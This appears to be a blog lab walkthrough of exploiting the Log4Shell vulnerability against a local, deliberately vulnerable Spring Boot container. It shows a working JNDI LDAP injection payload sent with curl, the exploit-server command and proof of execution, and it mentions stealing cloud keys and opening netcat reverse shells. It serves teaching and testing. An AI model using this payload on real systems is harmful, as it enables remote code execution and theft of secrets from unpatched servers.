A recently discovered vulnerability in the popular java logging tool Apache Log4j has been made public and the Internet is lit up like the proveriabe Christmas Tree! You can read up on Log4Shell over at Lunasec. There is also a list on Github showing the vulnerable web applications and vendors. But we’re here for the lab so lets get to it!

Disclaimer – as always only do this against a host you have explicit permission to do so with. Like your own lab, silly.

Setup
1 x Kali Linux VM, updated etc. Kali VM ip is 10.0.0.1 in this example.
Install docker
Download the JINDIExploit
wget https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip
unzip JNDIExploit.v1.2.zip
Run the vulnerable Spring Boot web application:
sudo docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app

Exploit
1. Make sure the docker spring boot web application is running.
sudo docker ps
2. Open a terminal window, setup the JINDIExploit malicous LDAP server:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 10.0.0.1 -p 8888
2. Open a termminal tab and run the exploit:
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://10.0.0.1:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
This will execute touch /tmp/pwned on the vulnerable web app.
3. Verify:
$sudo docker exec vulnerable-app ls -la /tmp
total 20
drwxrwxrwt 1 root root 4096 Dec 12 16:08 .
drwxr-xr-x 1 root root 4096 Dec 12 15:42 ..
drwxr-xr-x 2 root root 4096 Dec 12 15:43 hsperfdata_root
-rw-r–r– 1 root root 0 Dec 12 16:08 pwned

Annnd its done. This exploit is being used in all kinds of creative ways. The above is just a vanilla example. See this twitter link where an attacker can serialise the jindi ldap string for secret environment variables and keys (GCP, AWS etc). I’ve also seen examples of a reverse shell with netcat.

Mitigate
The patch is out for log4j, the issue is so many web apps and vendors have to roll fixes individually.